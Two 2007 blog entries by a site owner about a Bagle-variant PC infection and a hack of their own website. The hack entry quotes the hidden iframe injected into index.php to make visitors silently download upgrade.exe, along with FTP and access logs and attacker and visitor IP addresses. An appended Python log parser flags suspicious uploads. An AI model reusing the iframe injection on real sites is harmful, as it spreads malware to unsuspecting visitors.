Into the Void

Back off, man, I’m co-creating my reality.

Sunday
02/12/2007

8:12 pm

Gusano Bagel

It would, of course, have been far easier to reformat my hard drive.

The problem seems to be a bagel variant and has something to do with files named
C:\WINDOWS\system32\drivers\hidr.exe
C:\WINDOWS\system32\drivers\srosa.sys
and possibly an infected NETWAITING.EXE file.

I have tried multiple rootkit detection and removal programs with varying degrees of success.

McAfee Security Center says that no parts of my McAfee software are enabled. It says that parts of the software are missing and I have to reinstall.

McAfee Rootkit Detective 1.1 flagged hidr.sys and said it would remove it, but it didn’t.

F-Secure Online Virus Scanner is unable to download all its files - I suspect the bug is blocking them. Their Blacklight program has been integrated into the new scanner. Oh well.

AVG Free won’t install - it can’t find one of its installation files - I assume the malware is deleting it. AVG is my number one favorite free antivirus program.

Panda Anti-rootkit, available from Download.com, found the files and renamed one of them, but the problem came back next boot. Panda offers a number of free tools too, including an online scanner called ActiveScan and a beta online scanner named nano-scan. The big thing they offer is repair utilities for specific infections.

EliBagle v10.75 located the files and a registry entry. I rebooted in safe mode. I deleted the files. I deleted the registry entry. And just to be certain, I deleted the preload file for hidr.exe.

At this point IE is no longer going out to strange web sites. I can only hope that it was unable to download something even worse while McAfee was down.

My McAfee subscription is still active, but I haven’t decided whether to reinstall or to switch to something cheaper and just as useless.


Sunday
18/11/2007

10:11 pm

Hacked

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

<IFRAME name='StatPage'
src='upgrade.exe' width=5 height=5
style='display:none'></IFRAME>

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

68.14.90.4 - - [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www.bipolarplanet.com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.
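As an added example (not code from the post), here is a small Python parser for xferlog lines like the ones above that flags incoming executable uploads and any write or delete coming from an address other than the site owner's. The sample lines are copied from the post; the "known hosts" list is an assumption standing in for the addresses the owner normally connects from.

```python
import re

# Constructed sample: a subset of the xferlog lines quoted in the post.
SAMPLE_XFERLOG = """\
Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
"""

# xferlog fields: ctime timestamp, transfer seconds, remote host, byte count,
# path, type (a/b), special flag, direction (o=download, i=upload, d=delete),
# access mode, user, service, auth method, auth user id, completion status.
# Paths containing spaces are not handled by this simple pattern.
XFERLOG_RE = re.compile(
    r"^(?P<time>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<flag>\S) (?P<dir>[oid]) "
    r"(?P<mode>[arg]) (?P<user>\S+) (?P<service>\S+) (?P<auth>[01]) "
    r"(?P<authuser>\S+) (?P<status>[ci])$"
)

EXEC_EXTENSIONS = (".exe", ".scr", ".dll", ".com")


def parse_xferlog(text):
    """Parse xferlog lines into dicts, silently skipping lines that do not match."""
    records = []
    for line in text.splitlines():
        m = XFERLOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["size"] = int(rec["size"])
            records.append(rec)
    return records


def suspicious_writes(records, known_hosts=()):
    """Return (host, direction, basename) for uploads/deletes of executables,
    and for any upload/delete from a host not in known_hosts (assumed owner IPs)."""
    hits = []
    for r in records:
        if r["dir"] not in ("i", "d"):          # only writes and deletes matter
            continue
        basename = r["path"].rsplit("/", 1)[-1]
        is_exec = basename.lower().endswith(EXEC_EXTENSIONS)
        if is_exec or r["host"] not in known_hosts:
            hits.append((r["host"], r["dir"], basename))
    return hits


def first_write_per_host(records):
    """Earliest upload/delete timestamp seen for each remote host."""
    first = {}
    for r in records:
        if r["dir"] in ("i", "d") and r["host"] not in first:
            first[r["host"]] = r["time"]
    return first
```

On the sample, every flagged write comes from 66.246.252.53, the address the post identifies as the hacker, while the owner's own later edit of index.php is left alone.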
